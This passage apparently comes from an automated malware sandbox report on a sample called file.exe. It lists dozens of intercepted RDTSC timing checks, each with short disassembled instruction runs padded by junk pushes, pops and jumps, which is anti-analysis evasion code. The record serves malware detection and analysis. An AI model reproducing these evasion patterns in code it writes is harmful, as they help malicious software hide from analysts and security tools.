                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D89B20 second address: D89B6F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD288CC4A77h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c jmp 00007FD288CC4A71h 0x00000011 popad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 jmp 00007FD288CC4A79h 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D89B6F second address: D89B91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007FD2884F85D9h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8A642 second address: D8A647 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8AA1D second address: D8AA3A instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2884F85D4h 0x00000007 pushad 0x00000008 push edi 0x00000009 pop edi 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8AB9A second address: D8ABA2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8F36A second address: D8F370 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8F370 second address: D8F38D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FD288CC4A73h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8F38D second address: D8F39F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD2884F85CEh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8FAE6 second address: D8FAF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD288CC4A6Dh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8FAF7 second address: D8FB10 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2884F85D0h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8FB10 second address: D8FB27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FD288CC4A70h 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8F062 second address: D8F068 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D8F068 second address: D8F080 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD288CC4A74h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D900BC second address: D900C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D900C2 second address: D900C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D900C6 second address: D900E2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2884F85D8h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9333A second address: D93372 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 jmp 00007FD288CC4A76h 0x0000000a jmp 00007FD288CC4A78h 0x0000000f pushad 0x00000010 push ecx 0x00000011 pop ecx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D56B42 second address: D56B63 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD2884F85C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [eax] 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007FD2884F85D1h 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D56B63 second address: D56B71 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FD288CC4A66h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D56B71 second address: D56BC4 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b pushad 0x0000000c jmp 00007FD2884F85CCh 0x00000011 jmp 00007FD2884F85D0h 0x00000016 popad 0x00000017 pop eax 0x00000018 mov di, 3AF2h 0x0000001c mov cx, 9C0Dh 0x00000020 call 00007FD2884F85C9h 0x00000025 push eax 0x00000026 push edx 0x00000027 jmp 00007FD2884F85D6h 0x0000002c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D56BC4 second address: D56BCF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jp 00007FD288CC4A66h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D56BCF second address: D56BDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D56BDB second address: D56C09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007FD288CC4A6Ah 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FD288CC4A78h 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D56C09 second address: D56C0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D56C0F second address: D56C13 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D56C13 second address: D56C3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a jnp 00007FD2884F85D8h 0x00000010 jmp 00007FD2884F85D2h 0x00000015 mov dword ptr [esp+04h], eax 0x00000019 push esi 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d popad 0x0000001e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D56D01 second address: D56D06 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D57054 second address: D5709B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 je 00007FD2884F85C6h 0x0000000c pop ecx 0x0000000d popad 0x0000000e mov dword ptr [esp], eax 0x00000011 mov dword ptr [ebp+122D1B07h], edi 0x00000017 push 00000004h 0x00000019 push 00000000h 0x0000001b push ecx 0x0000001c call 00007FD2884F85C8h 0x00000021 pop ecx 0x00000022 mov dword ptr [esp+04h], ecx 0x00000026 add dword ptr [esp+04h], 0000001Bh 0x0000002e inc ecx 0x0000002f push ecx 0x00000030 ret 0x00000031 pop ecx 0x00000032 ret 0x00000033 adc edi, 44B68711h 0x00000039 push eax 0x0000003a pushad 0x0000003b push esi 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5709B second address: D570A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D570A4 second address: D570A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D573DB second address: D5740E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 jl 00007FD288CC4A66h 0x00000009 pop ebx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d mov dword ptr [ebp+122D25BDh], ebx 0x00000013 push 0000001Eh 0x00000015 sbb edx, 78DD2F00h 0x0000001b nop 0x0000001c push edx 0x0000001d pushad 0x0000001e push esi 0x0000001f pop esi 0x00000020 js 00007FD288CC4A66h 0x00000026 popad 0x00000027 pop edx 0x00000028 push eax 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d jo 00007FD288CC4A66h 0x00000033 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5740E second address: D57412 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D57412 second address: D57418 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5751A second address: D57533 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2884F85D5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D57533 second address: D57539 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D576FE second address: D57708 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FD2884F85C6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D57708 second address: D5777B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b or edi, 45B11622h 0x00000011 lea eax, dword ptr [ebp+1247B386h] 0x00000017 push 00000000h 0x00000019 push ebp 0x0000001a call 00007FD288CC4A68h 0x0000001f pop ebp 0x00000020 mov dword ptr [esp+04h], ebp 0x00000024 add dword ptr [esp+04h], 0000001Dh 0x0000002c inc ebp 0x0000002d push ebp 0x0000002e ret 0x0000002f pop ebp 0x00000030 ret 0x00000031 mov dword ptr [ebp+122D17F4h], eax 0x00000037 jmp 00007FD288CC4A6Dh 0x0000003c mov ecx, dword ptr [ebp+122D25D2h] 0x00000042 push eax 0x00000043 push eax 0x00000044 push edx 0x00000045 jns 00007FD288CC4A7Bh 0x0000004b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D5777B second address: D57780 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D57780 second address: D57817 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], eax 0x0000000a push 00000000h 0x0000000c push ecx 0x0000000d call 00007FD288CC4A68h 0x00000012 pop ecx 0x00000013 mov dword ptr [esp+04h], ecx 0x00000017 add dword ptr [esp+04h], 0000001Ch 0x0000001f inc ecx 0x00000020 push ecx 0x00000021 ret 0x00000022 pop ecx 0x00000023 ret 0x00000024 call 00007FD288CC4A79h 0x00000029 xor ecx, dword ptr [ebp+122D3823h] 0x0000002f pop edi 0x00000030 sub dword ptr [ebp+122D27B3h], esi 0x00000036 mov dword ptr [ebp+122D2813h], edi 0x0000003c lea eax, dword ptr [ebp+1247B342h] 0x00000042 push 00000000h 0x00000044 push edx 0x00000045 call 00007FD288CC4A68h 0x0000004a pop edx 0x0000004b mov dword ptr [esp+04h], edx 0x0000004f add dword ptr [esp+04h], 0000001Ch 0x00000057 inc edx 0x00000058 push edx 0x00000059 ret 0x0000005a pop edx 0x0000005b ret 0x0000005c mov edx, dword ptr [ebp+122D25C2h] 0x00000062 nop 0x00000063 push eax 0x00000064 push edx 0x00000065 pushad 0x00000066 jg 00007FD288CC4A66h 0x0000006c pushad 0x0000006d popad 0x0000006e popad 0x0000006f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D57817 second address: D57821 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FD2884F85C6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D57821 second address: D57859 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD288CC4A6Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d jnc 00007FD288CC4A68h 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FD288CC4A79h 0x0000001a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D57859 second address: D3BB46 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD2884F85C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c and edx, 69FCD3F8h 0x00000012 call dword ptr [ebp+122D56D4h] 0x00000018 push ecx 0x00000019 jmp 00007FD2884F85D3h 0x0000001e push esi 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9AC90 second address: D9AC9F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ecx 0x00000007 js 00007FD288CC4A6Ch 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9ADEB second address: D9ADF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9B0E1 second address: D9B0E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9B0E5 second address: D9B10C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2884F85D3h 0x00000007 je 00007FD2884F85C6h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 pushad 0x00000011 jnp 00007FD2884F85DDh 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9B10C second address: D9B126 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD288CC4A71h 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: D9B276 second address: D9B2A8 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 jmp 00007FD2884F85D6h 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push edx 0x0000000f jo 00007FD2884F85D2h 0x00000015 jc 00007FD2884F85C6h 0x0000001b jc 00007FD2884F85C6h 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA26D3 second address: DA26D7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA1249 second address: DA1291 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD2884F85CBh 0x00000009 jnp 00007FD2884F85C6h 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FD2884F85D8h 0x00000017 jmp 00007FD2884F85D8h 0x0000001c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA142F second address: DA1439 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD288CC4A72h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA1439 second address: DA143F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA171C second address: DA172B instructions: 0x00000000 rdtsc 0x00000002 jns 00007FD288CC4A66h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA19FF second address: DA1A03 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA1B6D second address: DA1B7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FD288CC4A6Bh 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA0E0A second address: DA0E10 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA0E10 second address: DA0E14 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA0E14 second address: DA0E28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ecx 0x0000000c jnp 00007FD2884F85C6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA0E28 second address: DA0E39 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jo 00007FD288CC4A6Ch 0x0000000b jno 00007FD288CC4A66h 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA5054 second address: DA5058 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA5058 second address: DA505E instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA505E second address: DA5068 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007FD2884F85C6h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA5068 second address: DA5095 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD288CC4A78h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push ebx 0x0000000c jmp 00007FD288CC4A6Ah 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 pop eax 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA4C1D second address: DA4C22 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA4C22 second address: DA4C31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007FD288CC4A66h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA4C31 second address: DA4C37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA4C37 second address: DA4C3B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA4DCD second address: DA4DD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA4DD3 second address: DA4DD9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA81A7 second address: DA81CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD2884F85D7h 0x00000007 push edi 0x00000008 pop edi 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e jp 00007FD2884F85C6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA7A7F second address: DA7A83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA7A83 second address: DA7A93 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FD2884F85C6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push edx 0x0000000d pop edx 0x0000000e push edi 0x0000000f pop edi 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA7C05 second address: DA7C40 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD288CC4A6Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FD288CC4A79h 0x0000000e jne 00007FD288CC4A6Ch 0x00000014 jnc 00007FD288CC4A66h 0x0000001a popad 0x0000001b pushad 0x0000001c pushad 0x0000001d pushad 0x0000001e popad 0x0000001f push eax 0x00000020 push edx 0x00000021 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA7C40 second address: DA7C46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DA7F06 second address: DA7F0A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DACEB5 second address: DACEB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DACEB9 second address: DACED2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD288CC4A75h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DACED2 second address: DACEDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DACEDD second address: DACEF7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD288CC4A75h 0x00000009 popad 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DACEF7 second address: DACF02 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jno 00007FD2884F85C6h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DACF02 second address: DACF21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD288CC4A77h 0x00000009 popad 0x0000000a push ecx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DACF21 second address: DACF53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD2884F85D7h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push esi 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007FD2884F85D1h 0x00000014 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DAD20D second address: DAD212 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB18B7 second address: DB18D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD2884F85D4h 0x00000009 popad 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB0AEE second address: DB0AF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB0AF3 second address: DB0B02 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FD2884F85CAh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB10ED second address: DB10F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FD288CC4A66h 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB13C7 second address: DB13F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD2884F85D0h 0x00000009 jmp 00007FD2884F85D4h 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: DB13F4 second address: DB13FE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 js 00007FD288CC4A66h 0x0000000a rdtsc
